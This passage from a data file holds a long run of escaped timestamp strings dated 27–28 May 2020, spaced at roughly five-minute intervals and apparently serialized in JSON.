14:37:40+00:00\",\"2020-05-28 13:18:02+00:00\",\"2020-05-28 13:43:12+00:00\",\"2020-05-28 13:02:46+00:00\",\"2020-05-28 13:08:10+00:00\",\"2020-05-28 13:23:30+00:00\",\"2020-05-28 13:27:50+00:00\",\"2020-05-28 13:52:55+00:00\",\"2020-05-28 13:12:33+00:00\",\"2020-05-28 13:33:27+00:00\",\"2020-05-28 13:37:40+00:00\",\"2020-05-28 13:47:30+00:00\",\"2020-05-28 10:47:47+00:00\",\"2020-05-28 10:07:35+00:00\",\"2020-05-28 10:12:45+00:00\",\"2020-05-28 10:17:53+00:00\",\"2020-05-28 10:33:18+00:00\",\"2020-05-28 10:42:41+00:00\",\"2020-05-28 10:52:55+00:00\",\"2020-05-28 10:03:30+00:00\",\"2020-05-28 10:22:59+00:00\",\"2020-05-28 10:28:10+00:00\",\"2020-05-28 10:38:31+00:00\",\"2020-05-28 09:02:34+00:00\",\"2020-05-28 09:12:50+00:00\",\"2020-05-28 09:23:15+00:00\",\"2020-05-28 09:32:32+00:00\",\"2020-05-28 09:43:01+00:00\",\"2020-05-28 09:48:03+00:00\",\"2020-05-28 09:07:46+00:00\",\"2020-05-28 09:37:43+00:00\",\"2020-05-28 09:18:03+00:00\",\"2020-05-28 09:28:23+00:00\",\"2020-05-28 09:53:14+00:00\",\"2020-05-28 15:18:02+00:00\",\"2020-05-28 15:22:29+00:00\",\"2020-05-28 15:27:52+00:00\",\"2020-05-28 15:33:23+00:00\",\"2020-05-28 15:08:17+00:00\",\"2020-05-28 15:12:42+00:00\",\"2020-05-28 15:43:17+00:00\",\"2020-05-28 15:47:30+00:00\",\"2020-05-28 15:02:49+00:00\",\"2020-05-28 15:37:38+00:00\",\"2020-05-28 15:52:59+00:00\",\"2020-05-28 17:08:17+00:00\",\"2020-05-28 17:17:54+00:00\",\"2020-05-28 17:33:21+00:00\",\"2020-05-28 17:12:35+00:00\",\"2020-05-28 17:27:48+00:00\",\"2020-05-28 16:57:35+00:00\",\"2020-05-28 17:02:49+00:00\",\"2020-05-28 17:23:27+00:00\",\"2020-05-28 16:02:45+00:00\",\"2020-05-28 16:08:08+00:00\",\"2020-05-28 16:12:33+00:00\",\"2020-05-28 16:18:02+00:00\",\"2020-05-28 16:23:13+00:00\",\"2020-05-28 16:48:09+00:00\",\"2020-05-28 16:28:19+00:00\",\"2020-05-28 16:33:30+00:00\",\"2020-05-28 16:37:42+00:00\",\"2020-05-28 16:42:54+00:00\",\"2020-05-28 16:53:27+00:00\",\"2020-05-28 01:03:09+00:00\",\"2020-05-28 01:43:02+00:00\",\"2020-05-28 01:53:19+00:00\",\"2020-05-28 01:07:34+00:00\",\"2020-05-28 01:12:57+00:00\",\"2020-05-28 01:28:17+00:00\",\"2020-05-28 01:37:46+00:00\",\"2020-05-28 01:18:23+00:00\",\"2020-05-28 01:22:48+00:00\",\"2020-05-28 01:32:30+00:00\",\"2020-05-28 01:48:10+00:00\",\"2020-05-27 21:03:06+00:00\",\"2020-05-27 21:13:31+00:00\",\"2020-05-27 21:22:44+00:00\",\"2020-05-27 21:28:01+00:00\",\"2020-05-27 21:52:44+00:00\",\"2020-05-27 21:17:36+00:00\",\"2020-05-27 21:33:05+00:00\",\"2020-05-27 21:38:18+00:00\",\"2020-05-27 21:43:29+00:00\",\"2020-05-27 21:47:34+00:00\",\"2020-05-27 21:08:16+00:00\",\"2020-05-28 05:32:37+00:00\",\"2020-05-28 05:37:55+00:00\",\"2020-05-28 05:02:58+00:00\",\"2020-05-28 05:17:54+00:00\",\"2020-05-28 05:23:22+00:00\",\"2020-05-28 05:27:36+00:00\",\"2020-05-28 05:43:14+00:00\",\"2020-05-28 05:52:36+00:00\",\"2020-05-28 05:08:29+00:00\",\"2020-05-28 05:12:40+00:00\",\"2020-05-28 05:48:28+00:00\",\"2020-05-27 23:28:03+00:00\",\"2020-05-27 23:48:15+00:00\",\"2020-05-27 23:07:45+00:00\",\"2020-05-27 23:13:07+00:00\",\"2020-05-27 23:18:21+00:00\",\"2020-05-27 23:42:42+00:00\",\"2020-05-27 23:03:26+00:00\",\"2020-05-27 23:22:46+00:00\",\"2020-05-27 23:33:14+00:00\",\"2020-05-27 23:38:26+00:00\",\"2020-05-27 23:52:31+00:00\",\"2020-05-28 06:18:01+00:00\",\"2020-05-28 06:23:29+00:00\",\"2020-05-28 06:38:12+00:00\",\"2020-05-28 06:42:30+00:00\",\"2020-05-28 06:02:56+00:00\",\"2020-05-28 06:12:31+00:00\",\"2020-05-28 06:27:48+00:00\",\"2020-05-28 06:32:56+00:00\",\"2020-05-28 06:47:47+00:00\",\"2020-05-28 06:08:15+00:00\",\"2020-05-28 06:53:06+00:00\",\"2020-05-28 08:38:00+00:00\",\"2020-05-28 08:52:45+00:00\",\"2020-05-28 08:03:17+00:00\",\"2020-05-28 08:07:34+00:00\",\"2020-05-28 08:12:53+00:00\",\"2020-05-28 08:18:17+00:00\",\"2020-05-28 08:22:32+00:00\",\"2020-05-28 08:27:39+00:00\",\"2020-05-28 08:32:50+00:00\",\"2020-05-28 08:48:23+00:00\",\"2020-05-28 08:43:17+00:00\",\"2020-05-28 03:07:41+00:00\",\"2020-05-28 03:12:53+00:00\",\"2020-05-28 03:37:39+00:00\",\"2020-05-28 03:18:02+00:00\",\"2020-05-28 03:23:10+00:00\",\"2020-05-28 03:42:46+00:00\",\"2020-05-28 03:53:05+00:00\",\"2020-05-28 03:02:33+00:00\",\"2020-05-28 03:28:19+00:00\",\"2020-05-28 03:33:29+00:00\",\"2020-05-28 03:48:01+00:00\",\"2020-05-28 00:03:15+00:00\",\"2020-05-28 00:23:28+00:00\",\"2020-05-28 00:27:45+00:00\",\"2020-05-28 00:38:13+00:00\",\"2020-05-28 00:53:14+00:00\",\"2020-05-28 00:12:48+00:00\",\"2020-05-28 00:33:00+00:00\",\"2020-05-28 00:43:29+00:00\",\"2020-05-28 00:47:57+00:00\",\"2020-05-28 00:07:37+00:00\",\"2020-05-28 00:18:07+00:00\",\"2020-05-27 22:08:07+00:00\",\"2020-05-27 22:13:22+00:00\",\"2020-05-27 22:27:43+00:00\",\"2020-05-27 22:42:34+00:00\",\"2020-05-27 22:48:08+00:00\",\"2020-05-27 22:52:35+00:00\",\"2020-05-27 22:02:58+00:00\",\"2020-05-27 22:18:26+00:00\",\"2020-05-27 22:22:36+00:00\",\"2020-05-27 22:32:56+00:00\",\"2020-05-27 22:38:14+00:00\",\"2020-05-28 07:08:22+00:00\",\"2020-05-28 07:12:46+00:00\",\"2020-05-28 07:37:47+00:00\",\"2020-05-28 07:48:25+00:00\",\"2020-05-28 07:28:05+00:00\",\"2020-05-28 07:43:04+00:00\",\"2020-05-28 07:02:52+00:00\",\"2020-05-28 07:18:16+00:00\",\"2020-05-28 07:22:37+00:00\",\"2020-05-28 07:32:29+00:00\",\"2020-05-28 07:52:36+00:00\",\"2020-05-27 18:03:30+00:00\",\"2020-05-27 18:07:49+00:00\",\"2020-05-27 18:13:24+00:00\",\"2020-05-27 18:27:32+00:00\",\"2020-05-27 18:42:37+00:00\",\"2020-05-27 18:48:08+00:00\",\"2020-05-27 18:52:34+00:00\",\"2020-05-27 18:23:07+00:00\",\"2020-05-27 18:17:46+00:00\",\"2020-05-27 18:32:58+00:00\",\"2020-05-27 18:38:30+00:00\",\"2020-05-27 20:03:02+00:00\",\"2020-05-27 20:08:22+00:00\",\"2020-05-27 20:22:52+00:00\",\"2020-05-27 20:28:01+00:00\",\"2020-05-27 20:38:24+00:00\",\"2020-05-27 20:52:46+00:00\",\"2020-05-27 20:17:43+00:00\",\"2020-05-27 20:12:37+00:00\",\"2020-05-27 20:33:14+00:00\",\"2020-05-27 20:43:28+00:00\",\"2020-05-27 20:47:36+00:00\",\"2020-05-28 00:38:14+00:00\",\"2020-05-28 00:48:23+00:00\",\"2020-05-28 00:58:26+00:00\",\"2020-05-28 01:18:46+00:00\",\"2020-05-28 01:23:44+00:00\",\"2020-05-28 00:43:17+00:00\",\"2020-05-28 01:08:34+00:00\",\"2020-05-28 01:33:50+00:00\",\"2020-05-28 00:53:26+00:00\",\"2020-05-28 01:03:37+00:00\",\"2020-05-28 01:13:36+00:00\",\"2020-05-28 01:28:50+00:00\",\"2020-05-27 19:48:46+00:00\",\"2020-05-27 19:53:49+00:00\",\"2020-05-27 20:03:57+00:00\",\"2020-05-27 20:09:04+00:00\",\"2020-05-27 20:14:07+00:00\",\"2020-05-27 19:38:39+00:00\",\"2020-05-27 19:43:43+00:00\",\"2020-05-27 19:58:54+00:00\",\"2020-05-27 20:18:10+00:00\",\"2020-05-27 20:23:13+00:00\",\"2020-05-27 20:28:18+00:00\",\"2020-05-27 20:33:23+00:00\",\"2020-05-28 08:48:28+00:00\",\"2020-05-28 09:08:40+00:00\",\"2020-05-28 09:18:47+00:00\",\"2020-05-28 09:28:55+00:00\",\"2020-05-28 08:43:20+00:00\",\"2020-05-28 09:13:43+00:00\",\"2020-05-28 08:53:28+00:00\",\"2020-05-28 08:58:31+00:00\",\"2020-05-28 09:03:36+00:00\",\"2020-05-28 09:23:50+00:00\",\"2020-05-28 09:34:03+00:00\",\"2020-05-28 14:13:38+00:00\",\"2020-05-28 14:23:47+00:00\",\"2020-05-28 13:43:16+00:00\",\"2020-05-28 13:48:18+00:00\",\"2020-05-28 13:53:30+00:00\",\"2020-05-28 13:58:29+00:00\",\"2020-05-28 14:03:32+00:00\",\"2020-05-28 14:08:35+00:00\",\"2020-05-28 14:18:44+00:00\",\"2020-05-28 14:28:55+00:00\",\"2020-05-28 14:33:55+00:00\",\"2020-05-28 07:48:40+00:00\",\"2020-05-28 08:03:53+00:00\",\"2020-05-28 08:19:07+00:00\",\"2020-05-28 08:28:10+00:00\",\"2020-05-28 07:43:37+00:00\",\"2020-05-28 07:53:45+00:00\",\"2020-05-28 08:08:57+00:00\",\"2020-05-28 08:33:16+00:00\",\"2020-05-28 07:38:37+00:00\",\"2020-05-28 07:58:48+00:00\",\"2020-05-28 08:14:04+00:00\",\"2020-05-28 08:23:08+00:00\",\"2020-05-28 04:53:19+00:00\",\"2020-05-28 05:13:32+00:00\",\"2020-05-28 05:18:35+00:00\",\"2020-05-28 05:23:40+00:00\",\"2020-05-28 05:33:46+00:00\",\"2020-05-28 04:58:23+00:00\",\"2020-05-28 05:03:28+00:00\",\"2020-05-28 05:08:29+00:00\",\"2020-05-28 05:28:43+00:00\",\"2020-05-28 04:43:13+00:00\",\"2020-05-28 04:48:15+00:00\",\"2020-05-28 11:48:39+00:00\",\"2020-05-28 12:19:05+00:00\",\"2020-05-28 11:53:41+00:00\",\"2020-05-28 12:08:56+00:00\",\"2020-05-28 12:23:14+00:00\",\"2020-05-28 12:28:19+00:00\",\"2020-05-28 11:43:36+00:00\",\"2020-05-28 11:58:45+00:00\",\"2020-05-28 12:03:52+00:00\",\"2020-05-28 12:13:59+00:00\",\"2020-05-28 12:33:20+00:00\",\"2020-05-27 22:38:13+00:00\",\"2020-05-27 23:28:23+00:00\",\"2020-05-27 22:43:17+00:00\",\"2020-05-27 22:58:43+00:00\",\"2020-05-27 23:03:53+00:00\",\"2020-05-27 23:08:59+00:00\",\"2020-05-27 23:13:07+00:00\",\"2020-05-27 23:33:30+00:00\",\"2020-05-27 22:48:22+00:00\",\"2020-05-27 22:53:34+00:00\",\"2020-05-27 23:18:17+00:00\",\"2020-05-27 23:23:19+00:00\",\"2020-05-27 20:38:27+00:00\",\"2020-05-27 21:03:48+00:00\",\"2020-05-27 21:33:22+00:00\",\"2020-05-27 20:43:27+00:00\",\"2020-05-27 20:53:36+00:00\",\"2020-05-27 21:08:51+00:00\",\"2020-05-27 21:23:10+00:00\",\"2020-05-27 20:48:33+00:00\",\"2020-05-27 20:58:40+00:00\",\"2020-05-27 21:13:59+00:00\",\"2020-05-27 21:19:05+00:00\",\"2020-05-27 21:28:15+00:00\",\"2020-05-28 05:38:47+00:00\",\"2020-05-28 05:43:52+00:00\",\"2020-05-28 05:48:55+00:00\",\"2020-05-28 05:54:01+00:00\",\"2020-05-28 06:08:11+00:00\",\"2020-05-28 06:33:29+00:00\",\"2020-05-28 05:59:05+00:00\",\"2020-05-28 06:03:09+00:00\",\"2020-05-28 06:13:15+00:00\",\"2020-05-28 06:18:20+00:00\",\"2020-05-28 06:23:22+00:00\",\"2020-05-28 06:28:31+00:00\",\"2020-05-28 15:43:15+00:00\",\"2020-05-28 15:58:26+00:00\",\"2020-05-28 16:13:47+00:00\",\"2020-05-28 16:24:04+00:00\",\"2020-05-28 16:33:09+00:00\",\"2020-05-28 15:48:17+00:00\",\"2020-05-28 16:29:00+00:00\",\"2020-05-28 15:53:29+00:00\",\"2020-05-28 16:03:29+00:00\",\"2020-05-28 16:08:38+00:00\",\"2020-05-28 16:18:54+00:00\",\"2020-05-28 16:48:19+00:00\",\"2020-05-28 16:53:26+00:00\",\"2020-05-28 17:08:49+00:00\",\"2020-05-28 17:13:53+00:00\",\"2020-05-28 17:19:03+00:00\",\"2020-05-28 17:28:17+00:00\",\"2020-05-28 16:43:16+00:00\",\"2020-05-28 16:58:37+00:00\",\"2020-05-28 17:23:10+00:00\",\"2020-05-28 17:33:25+00:00\",\"2020-05-28 17:03:45+00:00\",\"2020-05-28 01:44:02+00:00\",\"2020-05-28 02:18:24+00:00\",\"2020-05-28 02:28:30+00:00\",\"2020-05-28 02:33:38+00:00\",\"2020-05-28 01:38:58+00:00\",\"2020-05-28 01:49:04+00:00\",\"2020-05-28 01:54:05+00:00\",\"2020-05-28 02:08:17+00:00\",\"2020-05-28 02:23:28+00:00\",\"2020-05-28 01:58:12+00:00\",\"2020-05-28 02:03:16+00:00\",\"2020-05-28 02:13:20+00:00\",\"2020-05-28 12:43:30+00:00\",\"2020-05-28 12:58:44+00:00\",\"2020-05-28 13:03:53+00:00\",\"2020-05-28 13:08:53+00:00\",\"2020-05-28 13:23:59+00:00\",\"2020-05-28 13:29:01+00:00\",\"2020-05-28 12:48:32+00:00\",\"2020-05-28 12:53:36+00:00\",\"2020-05-28 13:13:55+00:00\",\"2020-05-28 13:18:58+00:00\",\"2020-05-28 13:34:06+00:00\",\"2020-05-27 21:38:30+00:00\",\"2020-05-27 21:53:44+00:00\",\"2020-05-27 22:18:57+00:00\",\"2020-05-27 21:43:30+00:00\",\"2020-05-27 21:48:38+00:00\",\"2020-05-27 21:58:45+00:00\",\"2020-05-27 22:08:50+00:00\",\"2020-05-27 22:24:05+00:00\",\"2020-05-27 22:03:48+00:00\",\"2020-05-27 22:13:56+00:00\",\"2020-05-27 22:29:07+00:00\",\"2020-05-27 22:33:10+00:00\",\"2020-05-28 06:58:49+00:00\",\"2020-05-28 07:03:58+00:00\",\"2020-05-28 07:13:10+00:00\",\"2020-05-28 07:18:20+00:00\",\"2020-05-28 07:23:20+00:00\",\"2020-05-28 06:38:37+00:00\",\"2020-05-28 06:43:39+00:00\",\"2020-05-28 06:53:44+00:00\",\"2020-05-28 07:09:11+00:00\",\"2020-05-28 06:48:39+00:00\",\"2020-05-28 07:28:24+00:00\",\"2020-05-28 07:33:26+00:00\",\"2020-05-28 03:43:22+00:00\",\"2020-05-28 03:53:28+00:00\",\"2020-05-28 04:24:01+00:00\",\"2020-05-28 03:48:21+00:00\",\"2020-05-28 04:03:36+00:00\",\"2020-05-28 04:08:44+00:00\",\"2020-05-28 04:18:57+00:00\",\"2020-05-28 04:29:07+00:00\",\"2020-05-28 03:38:17+00:00\",\"2020-05-28 03:58:32+00:00\",\"2020-05-28 04:13:54+00:00\",\"2020-05-28 04:34:06+00:00\",\"2020-05-28 09:53:10+00:00\",\"2020-05-28 09:58:24+00:00\",\"2020-05-28 10:13:29+00:00\",\"2020-05-28 10:33:43+00:00\",\"2020-05-28 09:39:03+00:00\",\"2020-05-28 09:44:04+00:00\",\"2020-05-28 10:03:28+00:00\",\"2020-05-28 10:28:50+00:00\",\"2020-05-28 09:48:07+00:00\",\"2020-05-28 10:08:27+00:00\",\"2020-05-28 10:18:33+00:00\",\"2020-05-28 10:23:40+00:00\",\"2020-05-28 15:03:24+00:00\",\"2020-05-28 15:08:33+00:00\",\"2020-05-28 15:23:52+00:00\",\"2020-05-28 15:28:59+00:00\",\"2020-05-28 15:34:07+00:00\",\"2020-05-28 14:43:08+00:00\",\"2020-05-28 14:48:14+00:00\",\"2020-05-28 14:58:22+00:00\",\"2020-05-28 15:18:43+00:00\",\"2020-05-28 14:53:14+00:00\",\"2020-05-28 15:13:42+00:00\",\"2020-05-27 18:03:27+00:00\",\"2020-05-27 18:18:37+00:00\",\"2020-05-27 18:33:47+00:00\",\"2020-05-27 18:13:35+00:00\",\"2020-05-27 18:23:38+00:00\",\"2020-05-27 18:28:44+00:00\",\"2020-05-27 17:58:23+00:00\",\"2020-05-27 18:08:31+00:00\",\"2020-05-27 18:38:56+00:00\",\"2020-05-27 18:43:55+00:00\",\"2020-05-27 18:53:59+00:00\",\"2020-05-27 19:03:07+00:00\",\"2020-05-27 18:49:00+00:00\",\"2020-05-27 19:23:26+00:00\",\"2020-05-27 19:28:31+00:00\",\"2020-05-27 19:33:39+00:00\",\"2020-05-27 18:59:05+00:00\",\"2020-05-27 19:08:12+00:00\",\"2020-05-27 19:13:17+00:00\",\"2020-05-27 19:18:19+00:00\",\"2020-05-27 23:38:32+00:00\",\"2020-05-27 23:43:33+00:00\",\"2020-05-27 23:53:43+00:00\",\"2020-05-28 00:08:53+00:00\",\"2020-05-28 00:24:02+00:00\",\"2020-05-27 23:48:39+00:00\",\"2020-05-27 23:58:47+00:00\",\"2020-05-28 00:03:50+00:00\",\"2020-05-28 00:13:58+00:00\",\"2020-05-28 00:19:01+00:00\",\"2020-05-28 00:29:09+00:00\",\"2020-05-28 00:33:13+00:00\",\"2020-05-28 02:48:45+00:00\",\"2020-05-28 02:53:49+00:00\",\"2020-05-28 02:58:55+00:00\",\"2020-05-28 03:19:05+00:00\",\"2020-05-28 03:24:08+00:00\",\"2020-05-28 03:28:09+00:00\",\"2020-05-28 02:38:38+00:00\",\"2020-05-28 03:09:03+00:00\",\"2020-05-28 03:33:17+00:00\",\"2020-05-28 02:43:41+00:00\",\"2020-05-28 03:03:54+00:00\",\"2020-05-28 03:14:01+00:00\",\"2020-05-28 11:13:14+00:00\",\"2020-05-28 11:33:23+00:00\",\"2020-05-28 10:48:53+00:00\",\"2020-05-28 11:04:07+00:00\",\"2020-05-28 11:18:14+00:00\",\"2020-05-28 11:23:17+00:00\",\"2020-05-28 11:28:23+00:00\",\"2020-05-28 10:43:50+00:00\",\"2020-05-28 10:54:03+00:00\",\"2020-05-28 10:59:03+00:00\",\"2020-05-28 11:08:07+00:00\",\"2020-05-28 14:49:37+00:00\",\"2020-05-28 14:54:51+00:00\",\"2020-05-28 14:59:46+00:00\",\"2020-05-28 15:05:09+00:00\",\"2020-05-28 15:10:18+00:00\",\"2020-05-28 15:14:40+00:00\",\"2020-05-28 15:20:14+00:00\",\"2020-05-28 15:24:51+00:00\",\"2020-05-28 15:29:39+00:00\",\"2020-05-28 15:34:44+00:00\",\"2020-05-28 15:39:50+00:00\",\"2020-05-27 22:44:06+00:00\",\"2020-05-27 22:49:33+00:00\",\"2020-05-27 22:54:14+00:00\",\"2020-05-27 22:59:27+00:00\",\"2020-05-27 23:04:17+00:00\",\"2020-05-27 23:09:22+00:00\",\"2020-05-27 23:14:14+00:00\",\"2020-05-27 23:19:26+00:00\",\"2020-05-27 23:24:14+00:00\",\"2020-05-27 23:29:22+00:00\",\"2020-05-27 23:34:05+00:00\",\"2020-05-28 00:44:16+00:00\",\"2020-05-28 00:49:13+00:00\",\"2020-05-28 00:54:44+00:00\",\"2020-05-28 00:59:28+00:00\",\"2020-05-28 01:04:18+00:00\",\"2020-05-28 01:09:30+00:00\",\"2020-05-28 01:14:28+00:00\",\"2020-05-28 01:19:17+00:00\",\"2020-05-28 01:24:21+00:00\",\"2020-05-28 01:29:59+00:00\",\"2020-05-28 01:34:20+00:00\",\"2020-05-27 18:40:19+00:00\",\"2020-05-27 18:45:04+00:00\",\"2020-05-27 18:50:03+00:00\",\"2020-05-27 18:54:56+00:00\",\"2020-05-27 19:00:02+00:00\",\"2020-05-27 19:04:53+00:00\",\"2020-05-27 19:10:33+00:00\",\"2020-05-27 19:14:43+00:00\",\"2020-05-27 19:19:45+00:00\",\"2020-05-27 19:24:53+00:00\",\"2020-05-27 19:29:45+00:00\",\"2020-05-27 19:34:43+00:00\",\"2020-05-28 04:45:01+00:00\",\"2020-05-28 04:50:24+00:00\",\"2020-05-28 04:54:48+00:00\",\"2020-05-28 04:59:43+00:00\",\"2020-05-28 05:04:49+00:00\",\"2020-05-28 05:09:54+00:00\",\"2020-05-28 05:14:50+00:00\",\"2020-05-28 05:19:53+00:00\",\"2020-05-28 05:25:30+00:00\",\"2020-05-28 05:30:34+00:00\",\"2020-05-28 05:35:09+00:00\",\"2020-05-27 19:39:45+00:00\",\"2020-05-27 19:45:27+00:00\",\"2020-05-27 19:49:55+00:00\",\"2020-05-27 19:54:44+00:00\",\"2020-05-27 19:59:58+00:00\",\"2020-05-27 20:05:06+00:00\",\"2020-05-27 20:09:45+00:00\",\"2020-05-27 20:15:12+00:00\",\"2020-05-27 20:19:59+00:00\",\"2020-05-27 20:25:28+00:00\",\"2020-05-27 20:29:46+00:00\",\"2020-05-27 20:35:32+00:00\",\"2020-05-27 21:44:28+00:00\",\"2020-05-27 21:49:09+00:00\",\"2020-05-27 21:54:15+00:00\",\"2020-05-27 21:59:18+00:00\",\"2020-05-27 22:04:00+00:00\",\"2020-05-27 22:09:21+00:00\",\"2020-05-27 22:14:01+00:00\",\"2020-05-27 22:19:21+00:00\",\"2020-05-27 22:24:05+00:00\",\"2020-05-27 22:28:58+00:00\",\"2020-05-27 22:34:33+00:00\",\"2020-05-27 20:40:05+00:00\",\"2020-05-27 20:45:16+00:00\",\"2020-05-27 20:50:33+00:00\",\"2020-05-27 20:55:33+00:00\",\"2020-05-27 21:00:12+00:00\",\"2020-05-27 21:05:30+00:00\",\"2020-05-27 21:09:49+00:00\",\"2020-05-27 21:15:29+00:00\",\"2020-05-27 21:19:13+00:00\",\"2020-05-27 21:23:49+00:00\",\"2020-05-27 21:29:08+00:00\",\"2020-05-27 21:33:58+00:00\",\"2020-05-28 05:44:56+00:00\",\"2020-05-28 05:50:31+00:00\",\"2020-05-28 05:54:51+00:00\",\"2020-05-28 06:00:17+00:00\",\"2020-05-28 06:05:22+00:00\",\"2020-05-28 06:09:57+00:00\",\"2020-05-28 06:14:54+00:00\",\"2020-05-28 06:20:08+00:00\",\"2020-05-28 06:25:10+00:00\",\"2020-05-28 06:30:29+00:00\",\"2020-05-28 15:49:46+00:00\",\"2020-05-28 15:55:18+00:00\",\"2020-05-28 16:00:16+00:00\",\"2020-05-28 16:04:41+00:00\",\"2020-05-28 16:09:54+00:00\",\"2020-05-28 16:14:45+00:00\",\"2020-05-28 16:20:03+00:00\",\"2020-05-28 16:24:52+00:00\",\"2020-05-28 16:29:58+00:00\",\"2020-05-28 16:34:44+00:00\",\"2020-05-28 16:40:15+00:00\",\"2020-05-28 12:49:59+00:00\",\"2020-05-28 12:54:37+00:00\",\"2020-05-28 12:59:45+00:00\",\"2020-05-28 13:04:45+00:00\",\"2020-05-28 13:09:55+00:00\",\"2020-05-28 13:14:28+00:00\",\"2020-05-28 13:19:38+00:00\",\"2020-05-28 13:24:48+00:00\",\"2020-05-28 13:30:09+00:00\",\"2020-05-28 13:35:08+00:00\",\"2020-05-28 13:39:35+00:00\",\"2020-05-28 08:49:21+00:00\",\"2020-05-28 08:54:08+00:00\",\"2020-05-28 08:59:14+00:00\",\"2020-05-28 09:04:18+00:00\",\"2020-05-28 09:09:18+00:00\",\"2020-05-28 09:14:21+00:00\",\"2020-05-28 09:19:30+00:00\",\"2020-05-28 09:24:06+00:00\",\"2020-05-28 09:29:27+00:00\",\"2020-05-28 09:34:49+00:00\",\"2020-05-28 09:39:15+00:00\",\"2020-05-28 09:44:43+00:00\",\"2020-05-28 07:26:18+00:00\",\"2020-05-28 07:28:21+00:00\",\"2020-05-28 07:33:56+00:00\",\"2020-05-28 07:39:34+00:00\",\"2020-05-28 07:44:37+00:00\",\"2020-05-28 02:44:26+00:00\",\"2020-05-28 02:50:11+00:00\",\"2020-05-28 02:54:38+00:00\",\"2020-05-28 02:59:35+00:00\",\"2020-05-28 03:04:30+00:00\",\"2020-05-28 03:09:46+00:00\",\"2020-05-28 03:14:42+00:00\",\"2020-05-28 03:19:29+00:00\",\"2020-05-28 03:24:36+00:00\",\"2020-05-28 03:30:09+00:00\",\"2020-05-28 03:34:50+00:00\",\"2020-05-28 10:49:35+00:00\",\"2020-05-28 10:54:19+00:00\",\"2020-05-28 10:59:28+00:00\",\"2020-05-28 11:05:35+00:00\",\"2020-05-28 11:09:22+00:00\",\"2020-05-28 11:14:39+00:00\",\"2020-05-28 11:19:16+00:00\",\"2020-05-28 11:24:27+00:00\",\"2020-05-28 11:29:33+00:00\",\"2020-05-28 11:34:44+00:00\",\"2020-05-28 11:39:20+00:00\",\"2020-05-28 11:44:45+00:00\",\"2020-05-28 01:44:44+00:00\",\"2020-05-28 01:49:43+00:00\",\"2020-05-28 01:54:34+00:00\",\"2020-05-28 01:59:30+00:00\",\"2020-05-28 02:04:27+00:00\",\"2020-05-28 02:10:03+00:00\",\"2020-05-28 02:14:29+00:00\",\"2020-05-28 02:19:52+00:00\",\"2020-05-28 02:24:23+00:00\",\"2020-05-28 02:29:26+00:00\",\"2020-05-28 02:34:25+00:00\",\"2020-05-28 16:49:51+00:00\",\"2020-05-28 16:55:17+00:00\",\"2020-05-28 16:59:56+00:00\",\"2020-05-28 17:04:46+00:00\",\"2020-05-28 17:10:37+00:00\",\"2020-05-28 17:14:57+00:00\",\"2020-05-28 17:20:07+00:00\",\"2020-05-28 17:24:47+00:00\",\"2020-05-28 17:30:21+00:00\",\"2020-05-28 17:35:05+00:00\",\"2020-05-28 03:45:22+00:00\",\"2020-05-28 03:49:58+00:00\",\"2020-05-28 03:55:06+00:00\",\"2020-05-28 04:00:15+00:00\",\"2020-05-28 04:05:27+00:00\",\"2020-05-28 04:09:42+00:00\",\"2020-05-28 04:15:08+00:00\",\"2020-05-28 04:19:58+00:00\",\"2020-05-28 04:25:10+00:00\",\"2020-05-28 04:29:40+00:00\",\"2020-05-28 04:35:02+00:00\",\"2020-05-28 09:49:58+00:00\",\"2020-05-28 09:54:19+00:00\",\"2020-05-28 09:59:25+00:00\",\"2020-05-28 10:04:48+00:00\",\"2020-05-28 10:09:24+00:00\",\"2020-05-28 10:14:36+00:00\",\"2020-05-28 10:19:28+00:00\",\"2020-05-28 10:24:47+00:00\",\"2020-05-28 10:29:37+00:00\",\"2020-05-28 10:34:21+00:00\",\"2020-05-28 10:39:22+00:00\",\"2020-05-28 10:44:37+00:00\",\"2020-05-28 11:50:07+00:00\",\"2020-05-28 11:55:01+00:00\",\"2020-05-28 11:59:37+00:00\",\"2020-05-28 12:04:38+00:00\",\"2020-05-28 12:09:47+00:00\",\"2020-05-28 12:14:25+00:00\",\"2020-05-28 12:19:35+00:00\",\"2020-05-28 12:26:16+00:00\",\"2020-05-28 12:29:55+00:00\",\"2020-05-28 12:34:36+00:00\",\"2020-05-28 12:39:51+00:00\",\"2020-05-27 23:44:25+00:00\",\"2020-05-27 23:49:10+00:00\",\"2020-05-27 23:54:52+00:00\",\"2020-05-27 23:59:32+00:00\",\"2020-05-28 00:04:50+00:00\",\"2020-05-28 00:09:18+00:00\",\"2020-05-28 00:14:14+00:00\",\"2020-05-28 00:19:06+00:00\",\"2020-05-28 00:24:36+00:00\",\"2020-05-28 00:29:10+00:00\",\"2020-05-28 00:34:17+00:00\",\"2020-05-28 07:49:44+00:00\",\"2020-05-28 07:54:32+00:00\",\"2020-05-28 07:59:28+00:00\",\"2020-05-28 08:04:30+00:00\",\"2020-05-28 08:09:04+00:00\",\"2020-05-28 08:14:05+00:00\",\"2020-05-28 08:19:10+00:00\",\"2020-05-28 08:24:36+00:00\",\"2020-05-28 08:29:20+00:00\",\"2020-05-28 08:34:28+00:00\",\"2020-05-28 08:39:03+00:00\",\"2020-05-28 08:44:21+00:00\",\"2020-05-27 18:00:27+00:00\",\"2020-05-27 18:04:39+00:00\",\"2020-05-27 18:09:42+00:00\",\"2020-05-27 18:14:41+00:00\",\"2020-05-27 18:19:42+00:00\",\"2020-05-27 18:24:57+00:00\",\"2020-05-27 18:30:14+00:00\",\"2020-05-27 18:34:57+00:00\",\"2020-05-28 13:49:40+00:00\",\"2020-05-28 13:55:03+00:00\",\"2020-05-28 14:00:08+00:00\",\"2020-05-28 14:05:02+00:00\",\"2020-05-28 14:09:50+00:00\",\"2020-05-28 14:14:37+00:00\",\"2020-05-28 14:19:46+00:00\",\"2020-05-28 14:24:53+00:00\",\"2020-05-28 14:29:46+00:00\",\"2020-05-28 14:34:53+00:00\",\"2020-05-28 14:39:44+00:00\",\"2020-05-28 05:04:05+00:00\",\"2020-05-28 05:13:42+00:00\",\"2020-05-28 05:23:20+00:00\",\"2020-05-28 05:33:51+00:00\",\"2020-05-28 05:53:42+00:00\",\"2020-05-28 05:08:25+00:00\",\"2020-05-28 05:19:03+00:00\",\"2020-05-28 05:28:33+00:00\",\"2020-05-28 05:39:04+00:00\",\"2020-05-28 05:48:38+00:00\",\"2020-05-28 05:43:13+00:00\",\"2020-05-28 13:29:00+00:00\",\"2020-05-28 13:38:52+00:00\",\"2020-05-28 13:23:27+00:00\",\"2020-05-28 13:33:27+00:00\",\"2020-05-28 13:54:08+00:00\",\"2020-05-28 13:03:45+00:00\",\"2020-05-28 13:08:13+00:00\",\"2020-05-28 13:13:39+00:00\",\"2020-05-28 